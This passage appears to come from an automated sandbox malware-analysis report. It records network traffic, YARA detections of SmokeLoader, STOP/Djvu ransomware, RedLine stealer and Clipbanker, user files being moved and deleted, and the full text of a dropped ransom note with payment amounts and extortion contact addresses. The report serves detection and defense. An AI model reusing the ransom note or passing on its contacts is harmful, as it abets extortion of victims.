people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
Source: aafg31.exe, 00000015.00000003.593189980.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: zy(["Env"],b):(window.Env=window.Env\|\|{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvXGo","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmS9OI","isCQuick":false});</script><script nonce="AWGLzne9">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="AWGLzne9"></style><script nonce="AWGLzne9">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
Source: aafg31.exe, 00000015.00000003.617256768.000001E292290000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643560384.000001E292292000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xlqkimn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org

Source: unknown	HTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.66.203.53:443 -> 192.168.2.3:49934 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49971 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.234.35:443 -> 192.168.2.3:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50031 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Source: 01860199.exe, 00000000.00000002.379986606.000000000084A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_readme.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-tnzomMj6HUPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshmail.topReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0717JOsieaz8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: D804.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D804.exe PID: 4528, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.D804.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.A170.exe.24c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.913F.exe.24115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.913F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.D804.exe.25315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.D804.exe.24615a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.D804.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.B46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.D804.exe.24615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.D804.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.483526399.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D804.exe PID: 2560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D804.exe PID: 772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D804.exe PID: 1340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D804.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D804.exe PID: 128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D804.exe PID: 4528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: B46F.exe PID: 4928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: B46F.exe PID: 2576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: A170.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D804.exe PID: 1264, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\D804.exe	File moved: C:\Users\user\Desktop\HMPPSXQPQV.png
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File deleted: C:\Users\user\Desktop\HMPPSXQPQV.png
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File moved: C:\Users\user\Desktop\NWCXBPIUYI.jpg
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File deleted: C:\Users\user\Desktop\NWCXBPIUYI.jpg
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File moved: C:\Users\user\Desktop\CZQKSDDMWR.png

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\AppData\Local\Temp\D804.exe	File dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-tnzommj6huprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0717josieaz8oayewngelvwqrvcqfni4j455hrwui26kpqtgc
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-tnzommj6huprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0717josieaz8oayewngelvwqrvcqfni4j455hrwui26kpqtgc

System Summary

Malicious sample detected (through community Yara rule)

Source: 30.0.build3.exe.1000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.0.build3.exe.1000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 30.2.build3.exe.1000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.build3.exe.1000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 18.2.D804.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.D804.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 40.0.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 40.0.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 27.2.A170.exe.24c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.A170.exe.24c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 34.2.913F.exe.24115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 34.2.913F.exe.24115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 37.2.913F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 37.2.913F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.D804.exe.25315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.D804.exe.25315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.D804.exe.24615a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.D804.exe.24615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 19.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.B46F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.B46F.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.D804.exe.24615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.D804.exe.24615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 19.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.D804.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 20.0.3C54.exe.4a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects downloader / injector Author: ditekSHen
Source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.380036043.0000000000859000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.460164953.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000026.00000002.501652652.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000019.00000002.473949878.0000000002434000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000026.00000002.506871844.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000000.474017727.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000000.474017727.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001C.00000002.488812684.000000000228A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000012.00000002.451349547.00000000023B3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.445989950.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
